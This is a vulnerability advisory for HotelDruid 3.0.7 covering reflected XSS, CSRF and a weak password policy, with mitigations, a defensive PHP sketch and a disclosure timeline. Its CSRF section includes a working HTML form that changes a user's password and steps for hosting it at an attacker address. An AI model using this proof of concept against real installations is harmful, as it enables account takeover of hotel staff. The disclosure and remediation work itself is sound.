Multiple Security Vulnerabilities Discovered in HotelDruid 3.0.7
CVE-2025-25747 | CVE-2025-25748 | CVE-2025-25749
Reported by: Huy Vo, Security Researcher
Description
During a security assessment of HotelDruid version 3.0.7, multiple vulnerabilities were discovered that impact the security and integrity of user accounts and the application itself. These include:
Reflected Cross-Site Scripting (XSS) (CVE-2025-25747) — Allows injection of arbitrary JavaScript in the context of authenticated users’ sessions.
Cross-Site Request Forgery (CSRF) (CVE-2025-25748) — Allows attackers to perform sensitive actions (like password changes) on behalf of authenticated users without their consent.
Weak Password Policy (CVE-2025-25749) — Allows the creation of accounts with extremely weak passwords, increasing the risk of brute force and credential stuffing attacks.
These vulnerabilities, especially when chained, can allow attackers to gain and escalate access, compromise user accounts, and impact the confidentiality and integrity of data stored in the application.
Severity & Impact
| CVE ID | Vulnerability Type | Severity | Impact Summary |
|---|---|---|---|
| CVE-2025-25747 | Reflected XSS | TBD | Arbitrary JavaScript execution, session hijacking, phishing, or malicious redirection. |
| CVE-2025-25748 | Cross-Site Request Forgery (CSRF) | TBD | Unauthorized password changes and account takeover. |
| CVE-2025-25749 | Weak Password Policy | TBD | Brute force and credential stuffing risks. |
Combined Risk:
An attacker who exploits these vulnerabilities together could easily gain initial access via weak credentials (CVE-2025-25749), escalate to session hijacking (CVE-2025-25747), and modify account credentials via CSRF (CVE-2025-25748). These flaws present serious risks to the integrity and confidentiality of the system.
Proof of Concept (PoC)
CVE-2025-25747 - Reflected XSS
Affected Endpoint
/crea_backup.php
Proof of Concept
Result
An alert box appears confirming successful injection. An attacker could replace the alert with more dangerous scripts (session theft, phishing, etc.).
CVE-2025-25748 - Cross-Site Request Forgery (CSRF)
Affected Endpoint
/gestione_utenti.php
Proof of Concept
Save the following HTML form as csrf_attack.html:
<form method="POST" action="http://localhost/hoteldruid/gestione_utenti.php">
  <input type="hidden" name="anno" value="2025">
  <input type="hidden" name="id_sessione" value="<valid_session_id>">
  <input type="hidden" name="modifica_pass" value="SI">
  <input type="hidden" name="id_utente_pass" value="2">
  <input type="hidden" name="prima_pass" value="maliciouspassword">
  <input type="hidden" name="seconda_pass" value="maliciouspassword">
  <button type="submit">Submit</button>
</form>
Hosting and Launching the Attack
python3 -m http.server 8080
When a logged-in user visits http://<attacker-ip>:8080/csrf_attack.html and submits the form, the password for user ID 2 is changed to maliciouspassword.
CVE-2025-25749 - Weak Password Policy
Observation
The application accepts weak passwords such as 12345 or admin, does not enforce minimum length, and allows password reuse.
Example Test Cases
Password 12345 - Accepted without warning.
Password admin - Accepted without warning.
Reuse password after changing to password123 - Allowed without restriction.
Multiple rapid password changes - Allowed without delay.
Analysis
Background
HotelDruid is an open-source property management system designed for managing reservations, customers, and billing for hotels, B&Bs, and vacation rentals. Given its role in managing sensitive data (guest information, payment records, etc.), secure authentication and session handling are critical for ensuring data confidentiality and preventing unauthorized access.
Vulnerability Details
CVE-2025-25747 - Reflected XSS
User-supplied input in the ripristina_backup parameter is rendered unsanitized into the page.
Attackers can craft malicious URLs that execute arbitrary JavaScript when visited by authenticated users.
CVE-2025-25748 - CSRF
No anti-CSRF tokens or Referer/Origin validation are present on sensitive actions (e.g., password changes in gestione_utenti.php).
Attackers can trick authenticated users into performing actions without their consent.
CVE-2025-25749 - Weak Password Policy
The application permits excessively weak passwords, including single-character strings, common passwords, and reused passwords.
No real-time feedback, complexity requirements, history checks, or minimum password age policies are present.
Mitigation / Patching
Recommendations
| Vulnerability | Recommendations |
|---|---|
| Reflected XSS | Input sanitization (e.g., htmlspecialchars()), output encoding, strict Content Security Policy (CSP). |
| CSRF | Implement anti-CSRF tokens, validate Origin/Referer headers, restrict sensitive actions to POST requests. |
| Weak Passwords | Enforce password complexity, minimum length (8+ characters), restrict reuse of the last 5 passwords, enforce minimum password age (24 hours). |
Additional Recommendations
Regenerate session tokens after authentication.
Avoid placing session tokens in URLs.
Notify users when passwords are changed.
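A PHP sketch of the checks recommended above and in the additional recommendations, written for a password-change handler shaped like gestione_utenti.php. This is an added example, not HotelDruid's own code; the function names, the expected origin string and the common-password blocklist are placeholders, and the thresholds are the ones the advisory recommends.

```php
<?php
// Added example, not HotelDruid's own code: the checks a hardened
// gestione_utenti.php password-change handler would run, using the
// advisory's thresholds (8+ chars, last 5 passwords, 24h minimum age).
declare(strict_types=1);

session_start();

// Per-session anti-CSRF token; emit it as a hidden field in every form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A POST is accepted only if its token matches (constant-time compare) and
// the Origin header is our own site, so a form served from another host fails.
function csrf_valid(array $post, array $server, string $expectedOrigin): bool {
    $token = $post['csrf_token'] ?? '';
    $known = $_SESSION['csrf_token'] ?? '';
    if ($known === '' || !is_string($token) || !hash_equals($known, $token)) {
        return false;
    }
    return ($server['HTTP_ORIGIN'] ?? '') === $expectedOrigin;
}

// Password policy: length, common-password blocklist (placeholder list), reuse
// of the last five stored hashes, and minimum age. Null means acceptable.
function password_policy_error(string $pw, array $previousHashes, int $lastChanged, int $now): ?string {
    if (strlen($pw) < 8) { return 'at least 8 characters required'; }
    if (in_array(strtolower($pw), ['12345', 'admin', 'password', 'password123'], true)) {
        return 'password is too common';
    }
    foreach (array_slice($previousHashes, -5) as $hash) {
        if (password_verify($pw, $hash)) { return 'password was used recently'; }
    }
    if ($now - $lastChanged < 86400) { return 'password changed less than 24 hours ago'; }
    return null;
}

// Reflected input (as crea_backup.php does with ripristina_backup) must be
// HTML-encoded at output time rather than echoed raw.
function safe_echo(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// After a successful login, rotate the session id so a pre-login id is useless.
function on_login_success(): void { session_regenerate_id(true); }
```

The minimum-age check should be bypassable for administrator-initiated resets, otherwise a user cannot recover promptly from a change they did not make.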
Timeline and Credits
| Date | Event |
|---|---|
| January 16, 2025 | Vulnerabilities discovered |
| January 17, 2025 | Vendor notified |
| February 27, 2025 | CVE IDs assigned (CVE-2025-25747, CVE-2025-25748, CVE-2025-25749) |
| March 7, 2025 | Coordinated disclosure published |
| Researcher | Huy Vo |
Contact
For questions, further technical details, or assistance with mitigation, please contact:
Huy Vo
Security Researcher | huyvo.net